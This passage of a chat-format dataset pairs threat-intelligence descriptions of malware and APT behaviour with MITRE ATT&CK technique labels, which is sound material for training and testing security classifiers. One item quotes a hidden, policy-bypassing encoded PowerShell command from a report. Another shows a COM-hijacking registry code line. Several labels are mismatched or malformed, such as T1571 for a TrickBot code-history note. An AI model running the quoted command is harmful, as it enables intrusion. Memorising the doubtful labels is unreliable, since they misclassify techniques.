- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can inject itself into processes including explore.exe, Iexplore.exe, and Mobsync.exe."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Moses Staff has dropped a web shell onto a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Exploitation and Malware Execution . Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. When the malicious RTF document is opened, two things happen that allow the attacker malware to run. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The encrypted request includes a PC identifier and timestamp, and optionally some other data. It is worth noting that the RC2FM module uses a number of encryption methods (variations of a simple XOR encryption routine), unlike the other InvisiMole parts"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman encodes data using hexadecimal representation before sending it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has used HTTPS in communications with C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named “vmtoolsd.” Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name ‘MSASCuiLTasks’ in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete files and directories."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "terminates anti-malware processes if they’re found running on the system."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files: MD5 Filename d76261ba3b624933a6ebb5dd73758db4 WmiApCom 79b68cdd0044edd4fbf8067b22878644 WmiApCom.bat The “WmiApCom.bat” file is simply used to start “WmiApCom”, which happens to be the exact same file as the one dropped by the malicious Word documents"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindTail has the ability to use HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink can upload files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dok downloads and installs Tor via homebrew."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used COM hijacking for persistence by replacing the legitimate MMDeviceEnumerator object with a payload."
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can determine if a compromised host has security products installed."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. The DLL acts as a stub loader, which loads and executes the shell code. The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English"
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall', 'T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has used dynamic DNS in its C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "will timestomp any files or payloads placed on a target machine to help them blend in."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDelete is digitally signed by Microsoft."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has changed file permissions of files so they could not be modified."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can add a CLSID key for payload execution through `Registry.CurrentUser.CreateSubKey(\"Software\\\\Classes\\\\CLSID\\\\{\" + clsid + \"}\\\\InProcServer32\")`."
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used net time to check the local time on a target system."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. Unit 42 researchers have not observed any commands in the IRC channel. However, the IRC server's metadata indicates that the server was deployed on Jan"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperStack can use default credentials to connect to IPC$ shares on remote machines."
- },
- {
- "role": "assistant",
- "content": "T1078.001 - Valid Accounts: Default Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoJax has modified the Registry key \"‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute’\" from \"‘autocheck autochk *’\" to \"‘autocheck autoche *’\" in order to execute its payload during Windows startup."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can deobfuscate its payload prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They include registry, file system manipulations, and searching files with specific patterns, and retrieving and transferring them back to the server and gathering network status information"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker terminates various services related to system security and Windows."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry utilizes \"wmic\" to delete shadow copies."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account."
- },
- {
- "role": "assistant",
- "content": "T1114.003 - Email Collection: Email Forwarding Rule"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has been responsible for many large-scale attacks since at least 2014, using malicious email campaigns to distribute various banking trojans, ransomware, RATs, and backdoors. TA505 has been focused on delivering downloaders, information stealers, and other malware — threats that can remain in affected systems if not prevented or remediated. With the group's use of email as an entry point for malicious activities, the threat has become more serious for unwitting users and organizations"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bonadan has discovered the OS version, CPU model, and RAM size of the system it has been installed on."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 downloaded and launched code within a SCT file."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can timestomp any files or payloads placed on a target machine to help them blend in."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has achieved persistence via writing a PowerShell script to the autorun registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The wrapper JAR file drops a secondary JAR file and copies it to a %Temp% location. The payload JAR file can be extracted using AES decryption. The first 16 bytes in the file “k” seen in Figure 4 contains the key and the file “e” is the encrypted Java payload"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On January 1, 2017, we observed this URL responding to the above HTTP request with the following data:powershell.exe -exec bypass -window hidden -noni -nop -encoded JABjAG8AbQBtAGEAbgBkACAAPQAgACcAVwB3AEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAE0AQQBaAFEAQgB5AEEASABZAEEAYQBRAEIAagBBAEcAVQBBAFUAQQBCAHYAQQBHAGsAQQBiAGcAQgAwAEEARQAwAEEAWQBRAEIAdQBBAEcARQBBAFoAdwBCAGwAQQBIAEkAQQBYAFEAQQA2AEEARABvAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBRAHcAQgBsAEEASABJAEEAZABBAEIAcABBAEcAWQBBAGEAUQBCAGoAQQBHAEUAQQBkAEEAQgBsAEEARgBZAEEAWQBRAEIAcwBBAEcAawBBAFoAQQBCAGgAQQBIAF..snip..As you can see, the C2 server responds with a PowerShell command that will run on the system"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream has the ability to discover application windows via execution of `EnumWindows`."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used a malware variant called WIDETONE to conduct port scans on the specified subnets."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Spalax, the threat actors obtained packers such as CyaX."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Thrip used a cloud-based remote access software called LogMeIn for their attacks."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin gathers the IP address and domain from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can download files to specified targets."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "will attempt to detect if the infected host is configured to a proxy. If so, will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000. will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2. Adversaries can also use to establish an RDP connection with a controller over TCP/7519."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has deleted itself and associated artifacts from victim machines."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used scheduled tasks to persist on victim systems."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deletes data in a way that makes it unrecoverable."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Obfuscation Mechanism for the JScript Code The malicious JScript code obfuscation relies on two main techniques"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key."
- },
- {
- "role": "assistant",
- "content": "T1606.001 - Web Cookies"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury can automatically exfiltrate gathered SSH credentials."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The bot shows a number of similarities to Dyre but appears to have been rewritten. This assumption is made based on old Dyre code, which would primarily use built-in functions for doing things such as AES and SHA256 hashing. In the recent samples identifying themselves as TrickBot, the code appears to be based on that old code but rewritten to use things such as Microsoft CryptoAPI and COM"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA"
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can recognize the presence of monitoring tools on a target system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe, as well as by adding a new service named OfficeUpdateService."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre uses HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ipconfig can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The x_mode command is disabled by default, but when enabled via a command received from the DNS tunneling channel, it allows RogueRobin to receive a unique identifier and to get jobs by using Google Drive API requests"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Technique Description Fan Check The Trojan will perform the following WMI query: Select * from Win32_Fan According to MSDN, this query should return a class that provides statistics on the CPU fan"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
